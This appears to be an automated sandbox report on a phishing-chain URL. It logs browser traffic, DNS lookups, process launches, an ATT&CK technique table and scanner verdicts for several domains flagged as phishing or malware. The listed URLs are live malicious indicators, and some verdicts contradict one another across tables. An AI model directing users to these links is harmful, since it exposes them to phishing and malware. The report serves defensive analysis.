Source: global trafficHTTP traffic detected: GET /_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/19d09a6113afa007.css HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /background.jpg HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oka.greenthreads.hr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: "4b5febb3fb4517a225620b5fe05016d2"If-Modified-Since: Thu, 27 Mar 2025 11:43:47 GMT
Source: global trafficHTTP traffic detected: GET /background.jpg HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oka.greenthreads.hrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: "4b5febb3fb4517a225620b5fe05016d2"If-Modified-Since: Thu, 27 Mar 2025 11:43:47 GMT
Source: global trafficDNS traffic detected: DNS query: www.clkmg.com
Source: global trafficDNS traffic detected: DNS query: netro.gitcombust.shop
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: patnero.thesilent.de
Source: global trafficDNS traffic detected: DNS query: classntfst.shop
Source: global trafficDNS traffic detected: DNS query: oka.greenthreads.hr
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac41512 HTTP/1.1Host: netro.gitcombust.shopConnection: keep-aliveContent-Length: 16562sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: https://netro.gitcombust.shopSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 15:42:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCf-Ray: 929932915f50425d-EWRServer: cloudflareCf-Cache-Status: HITAccess-Control-Allow-Origin: *Age: 71Cache-Control: max-age=14400Vary: Accept-EncodingX-Frame-Options: DENYX-Ms-Error-Code: WebContentNotFoundX-Ms-Request-Id: 09271e96-901e-004f-271c-a389b4000000X-Ms-Version: 2018-03-28Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbRrP%2FvfWD7Z98QTtF%2FFglELoafOFMXhQtTXWVyxjR44wD%2BDoSIVnyaOece5sOL71wauXUxZwjZ8gn3kmrOjY23ImMWh%2BExWOn5%2FH6oLCnC1nRHw%2B44nfzt8elSMaOrGkLmc1WEX4i4%3D"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104641&min_rtt=103947&rtt_var=22614&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1177&delivery_rate=35812&cwnd=231&unsent_bytes=0&cid=78a88924c9f9d997&ts=610&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 15:42:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-headers: Content-Type, Authorizationaccess-control-allow-methods: GET, POST, OPTIONSaccess-control-allow-origin: *content-security-policy: default-src 'none'rndr-id: b285bce4-88d9-4d1avary: Accept-Encodingx-content-type-options: nosniffx-powered-by: Expressx-render-origin-server: Rendercf-cache-status: DYNAMICServer: cloudflareCF-RAY: 929932b7fbf042be-EWRalt-svc: h3=":443"; ma=86400
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.11.99.233:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.83.187.233:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.24.57.1:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.88.234:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 76.76.21.21:443 -> 192.168.2.16:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6644_168253444
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6644_168253444
Source: classification engineClassification label: mal68.phis.win@24/21@29/181
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,15434814748562672815,12799368222423242180,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.clkmg.com/h4pussy/1ywq9a"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,15434814748562672815,12799368222423242180,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 12 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Extra Window Memory Injection | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Extra Window Memory Injection | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://www.clkmg.com/h4pussy/1ywq9a | 0% | Avira URL Cloud | safe | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac41512 | 0% | Avira URL Cloud | safe | |
| https://www.clkmg.com/favicon.ico | 0% | Avira URL Cloud | safe | |
| https://netro.gitcombust.shop/cdn-cgi/challenge-platform/scripts/jsd/main.js | 0% | Avira URL Cloud | safe | |
| https://netro.gitcombust.shop/favicon.ico | 0% | Avira URL Cloud | safe | |
| https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? | 0% | Avira URL Cloud | safe | |
| https://a.nel.cloudflare.com/report/v4?s=mbRrP%2FvfWD7Z98QTtF%2FFglELoafOFMXhQtTXWVyxjR44wD%2BDoSIVnyaOece5sOL71wauXUxZwjZ8gn3kmrOjY23ImMWh%2BExWOn5%2FH6oLCnC1nRHw%2B44nfzt8elSMaOrGkLmc1WEX4i4%3D | 0% | Avira URL Cloud | safe | |
| https://netro.gitcombust.shop/script.js | 0% | Avira URL Cloud | safe | |
| https://netro.gitcombust.shop/styles.css | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/background.jpg | 0% | Avira URL Cloud | safe | |
| https://classntfst.shop/ne/ | 100% | Avira URL Cloud | malware | |
| https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/chunks/main-de1ad41d606513c1.js | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/chunks/webpack-ee7e63bc15b31913.js | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/chunks/framework-2c79e2a64abdb08b.js | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.js | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/chunks/186-e401717d9e8b842b.js | 0% | Avira URL Cloud | safe | |
| https://patnero.thesilent.de/api/get_doc_url | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/favicon.ico | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/chunks/pages/_app-aea6920bd27938ca.js | 0% | Avira URL Cloud | safe | |
| https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.css | 0% | Avira URL Cloud | safe | |
| https://a.nel.cloudflare.com/report/v4?s=uscPBZFboHSqjG3PBXoSNdgWTJJ3Ec3XxwGQOY4aqFvfGmrquJVDLxvvwfn0jb7nav%2FrtbATB%2FdhYaWp322tlNP8i5IpZtatlkOjeVVJM4%2FYr5p1x48do12nsCibz%2FLGhfF%2FJAivCrM%3D | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| a.nel.cloudflare.com | 35.190.80.1 | true | false | | high |
| patnero.thesilent.de | 216.24.57.1 | true | false | | high |
| classntfst.shop | 104.21.88.234 | true | false | | high |
| oka.greenthreads.hr | 76.76.21.21 | true | false | | high |
| netro.gitcombust.shop | 104.21.32.1 | true | false | | high |
| www.google.com | 142.250.72.100 | true | false | | high |
| clk-1038715867.us-west-2.elb.amazonaws.com | 52.11.99.233 | true | false | | unknown |
| www.clkmg.com | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://oka.greenthreads.hr/background.jpg | true | Avira URL Cloud: safe | unknown |
| https://netro.gitcombust.shop/styles.css | false | Avira URL Cloud: safe | unknown |
| https://www.clkmg.com/redir.cgi?url=5YLzHJtmmpWmacBzmzCY%2flX4xlmtZYa5OH2D9HeWNiho6ITfHFNLv4fgDcASlkcXru2gSFAsJp%2fzvbDs&pixel=0&lidc=1749346618 | false | | unknown |
| https://a.nel.cloudflare.com/report/v4?s=mbRrP%2FvfWD7Z98QTtF%2FFglELoafOFMXhQtTXWVyxjR44wD%2BDoSIVnyaOece5sOL71wauXUxZwjZ8gn3kmrOjY23ImMWh%2BExWOn5%2FH6oLCnC1nRHw%2B44nfzt8elSMaOrGkLmc1WEX4i4%3D | false | Avira URL Cloud: safe | unknown |
| https://netro.gitcombust.shop/cdn-cgi/challenge-platform/scripts/jsd/main.js | false | Avira URL Cloud: safe | unknown |
| https://www.clkmg.com/favicon.ico | false | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_ssgManifest.js | true | Avira URL Cloud: safe | unknown |
| https://a.nel.cloudflare.com/report/v4?s=uscPBZFboHSqjG3PBXoSNdgWTJJ3Ec3XxwGQOY4aqFvfGmrquJVDLxvvwfn0jb7nav%2FrtbATB%2FdhYaWp322tlNP8i5IpZtatlkOjeVVJM4%2FYr5p1x48do12nsCibz%2FLGhfF%2FJAivCrM%3D | false | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/chunks/framework-2c79e2a64abdb08b.js | true | Avira URL Cloud: safe | unknown |
| https://classntfst.shop/ne/ | true | Avira URL Cloud: malware | unknown |
| https://patnero.thesilent.de/api/get_doc_url | false | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/ | true | | unknown |
| https://oka.greenthreads.hr/_next/static/chunks/main-de1ad41d606513c1.js | true | Avira URL Cloud: safe | unknown |
| https://netro.gitcombust.shop/script.js | false | Avira URL Cloud: safe | unknown |
| https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/scripts/jsd/708f7a809116/main.js? | false | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/chunks/pages/index-c362d579fbf7a668.js | true | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/chunks/webpack-ee7e63bc15b31913.js | true | Avira URL Cloud: safe | unknown |
| https://netro.gitcombust.shop/cdn-cgi/challenge-platform/h/b/jsd/r/0.216127262788091:1743517896:WH6ejxtsVObjbtfWl3K5Ys8Re23onSxZleFLZs8jUh4/929932861ac41512 | false | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/chunks/186-e401717d9e8b842b.js | true | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/fUhIl0Hqd1aZXohaxqY8t/_buildManifest.js | true | Avira URL Cloud: safe | unknown |
| https://www.clkmg.com/h4pussy/1ywq9a | false | | unknown |
| https://netro.gitcombust.shop/ | false | | unknown |
| https://oka.greenthreads.hr/favicon.ico | true | Avira URL Cloud: safe | unknown |
| https://netro.gitcombust.shop/favicon.ico | false | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/chunks/pages/_app-aea6920bd27938ca.js | true | Avira URL Cloud: safe | unknown |
| https://oka.greenthreads.hr/_next/static/css/19d09a6113afa007.css | true | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- | --- |
| 104.21.48.1 | unknown | United States | | 13335 | CLOUDFLARENETUS | false |
| 104.21.88.234 | classntfst.shop | United States | | 13335 | CLOUDFLARENETUS | false |
| 1.1.1.1 | unknown | Australia | | 13335 | CLOUDFLARENETUS | false |
| 104.21.32.1 | netro.gitcombust.shop | United States | | 13335 | CLOUDFLARENETUS | false |
| 216.24.57.1 | patnero.thesilent.de | United States | | 397273 | RENDERUS | false |
| 142.250.176.206 | unknown | United States | | 15169 | GOOGLEUS | false |
| 142.250.64.106 | unknown | United States | | 15169 | GOOGLEUS | false |
| 35.83.187.233 | unknown | United States | | 237 | MERIT-AS-14US | false |
| 142.250.80.67 | unknown | United States | | 15169 | GOOGLEUS | false |
| 142.251.40.110 | unknown | United States | | 15169 | GOOGLEUS | false |
| 52.11.99.233 | clk-1038715867.us-west-2.elb.amazonaws.com | United States | | 16509 | AMAZON-02US | false |
| 142.251.40.163 | unknown | United States | | 15169 | GOOGLEUS | false |
| 142.250.72.100 | www.google.com | United States | | 15169 | GOOGLEUS | false |
| 35.190.80.1 | a.nel.cloudflare.com | United States | | 15169 | GOOGLEUS | false |
| 76.76.21.21 | oka.greenthreads.hr | United States | | 16509 | AMAZON-02US | false |
| 142.251.41.3 | unknown | United States | | 15169 | GOOGLEUS | false |
| 172.253.115.84 | unknown | United States | | 15169 | GOOGLEUS | false |
| 142.251.35.174 | unknown | United States | | 15169 | GOOGLEUS | false |
                          IP
                          192.168.2.16
